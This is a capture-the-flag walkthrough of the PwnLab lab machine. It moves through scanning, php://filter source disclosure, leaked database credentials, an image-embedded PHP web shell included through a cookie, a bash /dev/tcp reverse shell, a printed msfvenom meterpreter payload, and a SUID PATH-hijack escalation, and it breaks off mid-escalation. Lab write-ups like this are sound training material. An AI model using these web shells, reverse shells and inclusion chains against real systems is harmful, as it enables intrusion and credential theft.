Information Gathering

Note: this is one of the rare boxes that VMware Workstation can open directly.

  • First, check Kali's own IP address:
root at kali in /pwnlab
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:64:21:cc brd ff:ff:ff:ff:ff:ff
inet 10.10.8.21/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
valid_lft 1732sec preferred_lft 1732sec
inet6 fe80::24ad:8964:fd1d:7210/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Host Discovery

  • An Nmap ping sweep turns up one new host, 10.10.8.18 (.1, .2 and .254 are the usual VMware NAT host, gateway and DHCP addresses, and .21 is Kali itself):
root at kali in /pwnlab 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 16:26 CST
Nmap scan report for 10.10.8.1
Host is up (0.00025s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000077s latency).
MAC Address: 00:50:56:F2:17:CE (VMware)
Nmap scan report for 10.10.8.18
Host is up (0.0072s latency).
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000046s latency).
MAC Address: 00:50:56:E0:97:CA (VMware)
Nmap scan report for 10.10.8.21
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.51 seconds

Port Scanning

  • Scan all 65535 TCP ports:
root at kali in /pwnlab 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.18 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 16:27 CST
Nmap scan report for 10.10.8.18
Host is up (0.00016s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36670/udp6 status
| 100024 1 39452/tcp status
| 100024 1 51307/udp status
|_ 100024 1 55096/tcp6 status
3306/tcp open mysql
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 37
| Capabilities flags: 63487
| Some Capabilities: IgnoreSigpipes, FoundRows, Support41Auth, LongColumnFlag, IgnoreSpaceBeforeParenthesis, ODBCClient, Speaks41ProtocolOld, SupportsCompression, Speaks41ProtocolNew, InteractiveClient, ConnectWithDatabase, SupportsTransactions, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, LongPassword, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: V!@\0w*iSC4{3)q#SZJD
|_ Auth Plugin Name: mysql_native_password
39452/tcp open status
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds

Service Identification

  • Fingerprint the services on those ports (because only open ports were passed with -p, Nmap warns that its OS guess is unreliable: it wants at least one closed port to compare against):
root at kali in /pwnlab 
$ nmap -p80,111,3306,39452 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.18 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 16:29 CST
Nmap scan report for 10.10.8.18
Host is up (0.00067s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36670/udp6 status
| 100024 1 39452/tcp status
| 100024 1 51307/udp status
|_ 100024 1 55096/tcp6 status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
39452/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 10.10.8.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds

Vulnerability Scanning

  • Run Nmap's vuln script category:
root at kali in /pwnlab 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.18 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 16:30 CST
Nmap scan report for 10.10.8.18
Host is up (0.00040s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.8.18
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.8.18:80/?page=login
| Form id: user
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.0.1
| http-cookie-flags:
| /login.php:
| PHPSESSID:
|_ httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /login.php: Possible admin folder
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_ /upload/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
111/tcp open rpcbind
3306/tcp open mysql
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 322.70 seconds
  • Nothing in the vuln output is directly exploitable (the CSRF, Slowloris and cookie-flag findings are generic), but http-enum already confirms /login.php plus /images/ and /upload/ with directory listing enabled.

Directory Scanning

root at kali in ~ 
$ dirsearch -u http://10.10.8.18 -o /pwnlab/dirsearch.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /pwnlab/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-23-11-27_16-31-38.log

Target: http://10.10.8.18/

[16:31:38] Starting:
[16:31:39] 403 - 296B - /.ht_wsr.txt
[16:31:39] 403 - 299B - /.htaccess.bak1
[16:31:39] 403 - 299B - /.htaccess.orig
......

root at kali in /pwnlab
$ cat dirsearch.txt | grep 200
200 0B http://10.10.8.18:80/config.php
200 939B http://10.10.8.18:80/images/
200 332B http://10.10.8.18:80/index.php
200 332B http://10.10.8.18:80/index.php/login/
200 250B http://10.10.8.18:80/login.php
200 19B http://10.10.8.18:80/upload.php
200 739B http://10.10.8.18:80/upload/

Exploitation

  • Visiting each discovered path in turn shows this is clearly a hand-written site:

image-20231127163330938

  • There is a login page (login.php) and a file upload page (upload.php); the upload page refuses files until you are logged in:

image-20231127165509994

File Inclusion

  • A quick look shows the login and upload pages are reached through URLs of this form:
http://10.10.8.18/?page=login
  • Whatever value is passed is the page that gets rendered. A parameter used this way is a candidate for:
    • directory traversal
    • file inclusion
    • SQL injection

Wfuzz

  • File inclusion is the most likely, so try Wfuzz:
root at kali in /usr/share/wordlists/wfuzz/general 
$ wfuzz -u "http://10.10.8.18/?page=FUZZ" -w /usr/share/wordlists/wfuzz/general/common.txt -f wfuzz.txt

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://10.10.8.18/?page=FUZZ
Total requests: 951

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 11 L 28 W 265 Ch "@"
000000048: 200 11 L 28 W 265 Ch "admon"
000000031: 200 11 L 28 W 265 Ch "action"
000000046: 200 11 L 28 W 265 Ch "admin_logon"
000000007: 200 11 L 28 W 265 Ch "10"
......
  • Nearly every response is 11 lines long, so filter those out with grep:
root at kali in /usr/share/wordlists/wfuzz/general 
$ cat wfuzz.txt| grep -v "11 L"
Target: http://10.10.8.18/?page=FUZZ
Total requests: 951
==================================================================
ID Response Lines Word Chars Request
==================================================================
00489: C=200 16 L 48 W 515 Ch "login"
00862: C=200 9 L 30 W 257 Ch "upload"

Total time: 0
Processed Requests: 949
Filtered Requests: 0
Requests/sec.: 0
  • This turned out to be the wrong test: common.txt only enumerates which page names exist (login and upload), it does not probe the parameter for inclusion. That test comes next.

PHP Stream Wrappers

  • Since the parameter is handed to an include, try pulling in /etc/passwd:
http://10.10.8.18/?page=/etc/passwd
  • The page makes it obvious that the include failed, so try the PHP stream wrappers instead:
    • file://
    • data://
    • php://input
    • php://filter

login.php

root at kali in /usr/share/wordlists/wfuzz/general 
$ curl "http://10.10.8.18/?page=php://filter/read=convert.base64-encode/resource=login"
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
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</center>
</body>
</html>
  • php://filter works: the response carries the file base64-encoded, so decode it:
root at kali in /usr/share/wordlists/wfuzz/general 
$ echo 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 | base64 -d > login.php
  • login.php contains:
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
    $luser = $_POST['user'];
    $lpass = base64_encode($_POST['pass']);

    $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
    $stmt->bind_param('ss', $luser, $lpass);

    $stmt->execute();
    $stmt->store_Result();

    if ($stmt->num_rows == 1)
    {
        $_SESSION['user'] = $luser;
        header('Location: ?page=upload');
    }
    else
    {
        echo "Login failed.";
    }
}
else
{
?>
<form action="" method="POST">
    <label>Username: </label><input id="user" type="test" name="user"><br />
    <label>Password: </label><input id="pass" type="password" name="pass"><br />
    <input type="submit" name="submit" value="Login">
</form>
<?php
}
  • A simple login form. Note that it uses a prepared statement with bound parameters, so there is no SQL injection here, and that passwords are stored merely base64-encoded rather than hashed.
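  • The php://filter read above, automated as an added example (this is not code from the original write-up). extract_source() pulls the base64 blob out of the site's page template and decodes it, config_values() parses the `$name = "value";` lines of a decoded config, and read_source() does the HTTP round trip with the standard library only. The target URL is an assumption; SAMPLE_RESPONSE is constructed, while CONFIG_RESPONSE is the config.php response captured on this box.

```python
"""Added example: automate the php://filter source read used in this write-up."""
import base64
import re
import urllib.parse
import urllib.request

# The base64 sits between the template's "<hr/><br/>" and "</center>".
_BLOB = re.compile(r"<hr/><br/>\s*([A-Za-z0-9+/=]+)\s*</center>", re.S)
_ASSIGN = re.compile(rb'\$(\w+)\s*=\s*"([^"]*)"\s*;')


def filter_url(base: str, resource: str) -> str:
    """index.php appends ".php" to ?page=, so the resource is given without its
    extension and the wrapper path ends up as ...resource=login.php."""
    wrapper = "php://filter/read=convert.base64-encode/resource=" + resource
    return base.rstrip("/") + "/?page=" + urllib.parse.quote(wrapper, safe="/:=")


def extract_source(html: str):
    """Decoded file contents, or None if the response carried no blob (e.g. the
    include failed and PHP printed a warning instead)."""
    m = _BLOB.search(html)
    return base64.b64decode(m.group(1)) if m else None


def config_values(php: bytes) -> dict:
    """Pull $name = "value"; assignments out of a decoded config.php."""
    return {k.decode(): v.decode() for k, v in _ASSIGN.findall(php)}


def read_source(base: str, resource: str):
    """HTTP round trip (network; not exercised offline). Assumed target URL."""
    with urllib.request.urlopen(filter_url(base, resource), timeout=10) as r:
        return extract_source(r.read().decode(errors="replace"))


# Constructed sample: a known PHP snippet wrapped in the site's template.
SAMPLE_PHP = b'<?php\n$secret = "constructed";\n?>\n'
SAMPLE_RESPONSE = ('<html><body><center><img src="images/pwnlab.png"><br />\n'
                   '[ <a href="/">Home</a> ]\n<hr/><br/>\n'
                   + base64.b64encode(SAMPLE_PHP).decode() + "</center></body></html>")

# The config.php response captured on this box (real data from the write-up).
CONFIG_RESPONSE = ("<hr/><br/>\nPD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0K"
                   "JHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+</center>")


if __name__ == "__main__":
    print(filter_url("http://10.10.8.18", "config"))
    print(config_values(extract_source(CONFIG_RESPONSE)))
```

  • The regex deliberately anchors on the template's own markup: the same blob would also match a bare base64 string, but anchoring avoids picking up an image's base64 or an error message that happens to be alphanumeric.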

upload.php

  • Now the same for upload.php:
root at kali in /usr/share/wordlists/wfuzz/general 
$ curl "http://10.10.8.18/?page=php://filter/read=convert.base64-encode/resource=upload"
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
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</center>
</body>
</html>
  • Decode:
root at kali in /usr/share/wordlists/wfuzz/general 
$ echo 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 | base64 -d > upload.php
  • upload.php contains:
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
    <input type='file' name='file' id='file' />
    <input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename = $_FILES['file']['name'];
        $filetype = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png");

        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }

        if(strpos($filetype,'image') === false) {
            die('Error 001');
        }

        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }

        if(substr_count($filetype, '/')>1){
            die('Error 003');
        }

        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
        } else {
            die('Error 4');
        }
    }
}

?>
  • Also a simple upload handler. The extension must be in the whitelist, the client-supplied Content-Type must contain "image" and at most one "/", and getimagesize() must recognise the contents; the file is then stored as upload/<md5 of the original name><extension>. So the plan is a real image with PHP appended, uploaded under a .png name, and then included to get a shell.
  • Good, but there are still no credentials.
  • The directory scan did, however, find two more files:
    • index.php
    • config.php

index.php

  • index.php:
root at kali in /usr/share/wordlists/wfuzz/general 
$ curl "http://10.10.8.18/?page=php://filter/read=convert.base64-encode/resource=index"
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
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</center>
</body>
</html>
  • Decode:
$ echo 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 | base64 -d > index.php
  • index.php contains:
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
    include($_GET['page'].".php");
}
else
{
    echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
  • This explains why only php://filter worked: index.php appends ".php" to whatever page is given, so /etc/passwd became /etc/passwd.php, and an uploaded image shell would become something.png.php. The page parameter therefore cannot include the uploaded file either.
  • The lang cookie, however, is included as-is with only a "lang/" prefix, so a value such as ../upload/<name>.png reaches the uploaded file. That is the second inclusion point, and the one to use.

config.php

  • config.php:
root at kali in /usr/share/wordlists/wfuzz/general 
$ curl "http://10.10.8.18/?page=php://filter/read=convert.base64-encode/resource=config"
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+</center>
</body>
</html>
  • Decode:
root at kali in /usr/share/wordlists/wfuzz/general 
$ echo PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 -d > config.php
  • config.php contains:
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

MySQL Remote Connection

  • Try those credentials on the web login first:

image-20231127182611410

  • That fails, but port 3306 is open, so perhaps the database accepts remote connections. Try it:
# Start Kali's MySQL service (only the mysql client is actually needed for this)
root at kali in /pwnlab
$ systemctl start mysql

# Connect remotely; if it errors, restarting the target VM fixes it
root at kali in /pwnlab
$ mysql -uroot -pH4u%QJ_H99 -h10.10.8.18
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>
  • The server accepts root from a remote host, so browse the database:
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.001 sec)

MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.001 sec)
  • Three users with base64-encoded passwords, matching the base64_encode() in login.php. Decode them:
# kent
root at kali in /pwnlab
$ echo Sld6WHVCSkpOeQ== | base64 -d
JWzXuBJJNy

# mike
root at kali in /pwnlab
$ echo U0lmZHNURW42SQ== | base64 -d
SIfdsTEn6I

# kane
root at kali in /pwnlab
$ echo aVN2NVltMkdSbw== | base64 -d
iSv5Ym2GRo

File Upload

AntSword

  • With credentials in hand, log in:

image-20231127184240950

  • Logged in. As planned, build an image with PHP appended:
root at kali in /pwnlab 
$ wget http://10.10.8.18/images/pwnlab.png
--2023-11-27 18:44:42-- http://10.10.8.18/images/pwnlab.png
Connecting to 10.10.8.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13027 (13K) [image/png]
Saving to: ‘pwnlab.png’

pwnlab.png 100%[===================================================================>] 12.72K --.-KB/s in 0s

2023-11-27 18:44:42 (27.6 MB/s) - ‘pwnlab.png’ saved [13027/13027]

root at kali in /pwnlab
$ echo '<?php @eval($_REQUEST[1]);phpinfo();?>' >> pwnlab.png

root at kali in /pwnlab
$ tail -c 100 pwnlab.png
Ժ���6l�ش��^:����������n"쨣�qj��q[dV�V�>IEND�B`�<?php @eval($_REQUEST[1]);phpinfo();?>
  • Upload it:

image-20231127184708536

  • Upload succeeded; locate the stored file:

image-20231127184756067

  • Now include it. The page parameter cannot, so use the lang cookie with a value of the form ../upload/<md5>.png, where the md5 is that of the original filename, as upload.php computes it:

image-20231127185730917

  • The include works. Connect with AntSword (remember to set the Cookie header):

image-20231127190010229

  • AntSword's shell is not interactive, so spawn a reverse shell with nc:
# Kali
nc -lvvp 4444

# AntSword
bash -c 'bash -i &> /dev/tcp/10.10.8.21/4444 0>&1'

image-20231127190634868

  • Reverse shell received!

MSF

  • For anyone without AntSword installed, here is the same thing with MSF.
  • Generate a PHP web shell:
root at kali in /pwnlab 
$ msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.8.21 lport=6666 -o msf.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes
Saved as: msf.php
  • Build the image shell:
root at kali in /pwnlab 
$ cat msf.php >> pwnlab.png

root at kali in /pwnlab
$ tail -c 1200 pwnlab.png
M���k▒�ohX����Y�J�R�n�5�u[tԺ���6l�ش��^:����������n"쨣�qj��q[dV�V�>IEND�B`�/*<?php /**/ error_reporting(0); $ip = '10.10.8.21'; $port = 6666; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
  • Start a listener in MSF:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > set lhost 10.10.8.21
lhost => 10.10.8.21
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.8.21:6666
  • Upload the image and trigger it through the cookie exactly as with AntSword:

image-20231127192257667

  • Session received! Upgrade the shell:
meterpreter > shell
Process 1331 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@pwnlab:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Switching Users

  • List the users with a login shell:
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
  • Several users, and the names match the database entries, so try those passwords:
www-data@pwnlab:/var/www/html$ su kent
su kent
Password: JWzXuBJJNy

kent@pwnlab:/var/www/html$ ls -al /home/kent
ls -al /home/kent
total 20
drwxr-x--- 2 kent kent 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 kent kent 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kent kent 3515 Mar 17 2016 .bashrc
-rw-r--r-- 1 kent kent 675 Mar 17 2016 .profile
  • Nothing useful in kent's home; try the next one:
kent@pwnlab:/var/www/html$ su mike
su mike
Password: SIfdsTEn6I
su: Authentication failure
  • mike's database password does not work for his system account; next:
kent@pwnlab:/var/www/html$ su kane
su kane
Password: iSv5Ym2GRo

kane@pwnlab:/var/www/html$ id
id
uid=1003(kane) gid=1003(kane) groups=1003(kane)
kane@pwnlab:/var/www/html$ ls -al /home/kane
ls -al /home/kane
total 28
drwxr-x--- 2 kane kane 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
-rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile

SUID Privilege Escalation (1)

  • kane's home contains an executable with SUID and SGID set, owned by mike.
  • Run it and see what happens:
1
2
3
kane@pwnlab:/var/www/html$ /home/kane/msgmike
/home/kane/msgmike
cat: /home/mike/msg.txt: No such file or directory
  • It errors, and the message comes from cat. The binary evidently calls cat by name rather than by absolute path, so the command is resolved through PATH: create a fake cat and put its directory first in PATH:
kane@pwnlab:/var/www/html$ type cat
type cat
cat is /bin/cat
kane@pwnlab:/var/www/html$ echo $PATH
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

kane@pwnlab:/var/www/html$ cd ~
cd ~
kane@pwnlab:~$ echo '/bin/bash' > cat
echo '/bin/bash' > cat
kane@pwnlab:~$ cat cat
cat cat
/bin/bash
kane@pwnlab:~$ PATH=/home/kane:$PATH
PATH=/home/kane:$PATH
kane@pwnlab:~$ echo $PATH
echo $PATH
/home/kane:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ ls -al
ls -al
total 32
drwxr-x--- 2 kane kane 4096 Nov 27 06:50 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc
-rwxrwxrwx 1 kane kane 10 Nov 27 06:50 cat
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
-rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile
  • Run it:
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$ id
id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
  • Now running as mike. The fake cat has no shebang, but that is fine: when execve fails with ENOEXEC the shell falls back to running the file as a script, which executes /bin/bash.
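  • The PATH hijack above, reproduced as an added example (not code from the write-up; msgmike's real source is not on the page, only the fact that it runs cat by bare name). victim() stands in for the SUID binary, hardened() shows the fix, and demo() runs both under an attacker-controlled PATH in a throwaway temp directory, with no privileges involved.

```python
"""Added example: PATH hijack of a program that runs `cat` by bare name."""
import os
import shutil
import subprocess
import tempfile

# Constructed stand-in for the attacker's fake cat (the write-up's version is
# the bare text "/bin/bash" with no shebang; the ENOEXEC fallback runs it anyway).
FAKE_CAT = "#!/bin/sh\necho HIJACKED\n"


def victim(path_env: str, target: str) -> str:
    """Models msgmike: like system("cat /home/mike/msg.txt"), it lets /bin/sh
    resolve `cat` through PATH. Returns combined stdout and stderr."""
    r = subprocess.run(f"cat {target}", shell=True, env={"PATH": path_env},
                       capture_output=True, text=True)
    return r.stdout + r.stderr


def hardened(path_env: str, target: str) -> str:
    """Fix: absolute path and an argv list, so PATH is irrelevant. A real SUID
    program should also reset PATH itself and drop privileges before exec."""
    r = subprocess.run(["/bin/cat", target], env={"PATH": path_env},
                       capture_output=True, text=True)
    return r.stdout + r.stderr


def demo() -> dict:
    """Sets up the fake cat, runs both variants under an attacker-controlled
    PATH, and returns what each printed."""
    work = tempfile.mkdtemp(prefix="pathhijack")
    try:
        fake = os.path.join(work, "cat")
        with open(fake, "w") as f:
            f.write(FAKE_CAT)
        os.chmod(fake, 0o755)                       # the write-up used chmod 777
        msg = os.path.join(work, "msg.txt")
        with open(msg, "w") as f:
            f.write("hello from mike\n")
        clean_path = "/usr/local/bin:/usr/bin:/bin"
        evil_path = work + ":" + clean_path         # PATH=/home/kane:$PATH
        return {
            "victim_clean": victim(clean_path, msg).strip(),
            "victim_hijacked": victim(evil_path, msg).strip(),
            "hardened": hardened(evil_path, msg).strip(),
        }
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    for name, output in demo().items():
        print(f"{name}: {output}")
```

  • Only the hijacked run prints HIJACKED; the same PATH does nothing to the hardened variant because nothing is looked up.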

SUID Privilege Escalation (2)

  • Look at mike's home directory:
mike@pwnlab:~$ cd /home/mike
cd /home/mike
mike@pwnlab:/home/mike$ ls -al
ls -al
total 28
drwxr-x--- 2 mike mike 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17 2016 .bashrc
